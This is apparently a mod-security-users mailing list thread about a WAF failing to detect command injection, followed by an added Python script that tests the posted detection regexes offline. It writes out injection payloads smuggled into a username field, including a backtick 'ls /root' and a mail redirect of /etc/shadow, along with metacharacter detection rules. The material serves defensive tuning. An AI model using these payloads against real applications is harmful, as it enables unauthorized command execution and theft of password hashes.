On Fri, Aug 16, 2013 at 3:18 AM, rewt rewt <rewt@linux-elite.org> wrote:
I have a big issue with ModSecurity detecting a simple Remote Command Execution.
My WAF config is ModSecurity 2.7.1 with core rules based on scoring, but I don't have any logging for that request:

GET http://OBFUSCATED/application.pl?action=deleteaccount&username=%60ls%20/root/%20%3E%20/tmp/root%60&redirectionemail= HTTP/1.1

(also work for mail my@email.Com < /etc/shadow)

It is simply not detected in the logs!!!
I clearly don't understand why... it should be triggered by the "common attack" rules of the CRS activated rules, in my opinion.

The CRS does detect that attack, as seen here:
Can you increase your debug log level to 9 and send me your debug log privately?

I tried this without success:
SecRule ARGS "(;|\||\`)" "phase:3,t:none,log,deny,id:5000148"

As an aside, it's normally a good idea to stop an attack at the first point possible. For the ARGS collection that is in phase 2. Having said that, your rule above works as expected:

#curl localhost/test?abc=%3B

# less /opt/modsecurity/var/log/debug.log
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][5] Rule 7f3cf08e3e90: SecRule "ARGS" "@rx (;|\\||\\`)" "phase:3,auditlog,t:none,log,deny,id:5000148"
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Transformation completed in 0 usec.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Executing operator "rx" with param "(;|\\||\\`)" against ARGS:abc.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][9] Target value: ";"
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][6] Ignoring regex captures since "capture" action is not enabled.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Operator completed in 34 usec.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Rule returned 1.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][9] Match, intercepted -> returning.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][1] Access denied with code 403 (phase 3). Pattern match "(;|\\||\\`)" at ARGS:abc. [file "/opt/modsecurity/etc/rules.conf"] [line "9"] [id "5000148"]

 - Josh

SecRule ARGS ";" "phase:3,t:none,log,deny,id:5000148"
(I tried it with phase 2 or 1; the attack still succeeds)

Another interesting option could be to increase the score only for that virtual host, but I don't think it would be helpful as it is not detected.

Any help would be much appreciated !

Many thanks

David R
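To make the mismatch between the posted rules and the posted payloads concrete, here is an added example (not code from the thread, ModSecurity or the CRS) that replays the two request lines from the post offline. It decodes the query string the way the ARGS collection sees it and applies the two @rx patterns quoted above. Note that the second payload, "mail my@email.Com < /etc/shadow", contains none of ";", "|" or "`", and the first payload contains no ";", so neither rule as written can match the respective request regardless of phase. The second request line and the helper names are constructed for illustration; the host stays OBFUSCATED as on the page.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# The two patterns posted in the thread:
#   SecRule ARGS "(;|\||\`)" "phase:3,t:none,log,deny,id:5000148"
#   SecRule ARGS ";"         "phase:3,t:none,log,deny,id:5000148"
META_RX = re.compile(r"(;|\||`)")
SEMI_RX = re.compile(r";")

# Request line copied from the post (host obfuscated as on the page).
REQUEST_A = ("GET http://OBFUSCATED/application.pl?action=deleteaccount"
             "&username=%60ls%20/root/%20%3E%20/tmp/root%60"
             "&redirectionemail= HTTP/1.1")

# Constructed request line for the second payload the poster mentions
# ("mail my@email.Com < /etc/shadow"), URL-encoded the same way.
REQUEST_B = ("GET http://OBFUSCATED/application.pl?action=deleteaccount"
             "&username=mail%20my%40email.Com%20%3C%20/etc/shadow"
             "&redirectionemail= HTTP/1.1")


def request_args(request_line):
    """Return the decoded query-string arguments of an HTTP request line.

    This approximates the ARGS collection for a GET request: one
    percent-decoding pass, '+' treated as a space, empty values kept.
    (A real engine also adds POST body parameters; that is why the reply
    above points at phase 2 for ARGS.)
    """
    method, target, version = request_line.split(" ", 2)
    query = urlsplit(target).query
    return dict(parse_qsl(query, keep_blank_values=True))


def evaluate_rule(args, pattern=META_RX):
    """Apply an @rx operator to every ARGS value.

    Returns a list of (arg_name, arg_value, matched_text) for each value
    the pattern matches; an empty list means the rule would not fire.
    """
    hits = []
    for name, value in args.items():
        m = pattern.search(value)
        if m:
            hits.append((name, value, m.group(0)))
    return hits


if __name__ == "__main__":
    for label, line in (("A (backtick payload)", REQUEST_A),
                        ("B (redirect payload)", REQUEST_B)):
        args = request_args(line)
        print(label, "username =", repr(args["username"]))
        print("  (;|\\||`) ->", evaluate_rule(args, META_RX))
        print("  ;        ->", evaluate_rule(args, SEMI_RX))
```

Running it shows the backtick rule matching only request A (on the "`" in ARGS:username, matching the debug log excerpt above) and the bare ";" rule matching neither request.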

mod-security-users mailing list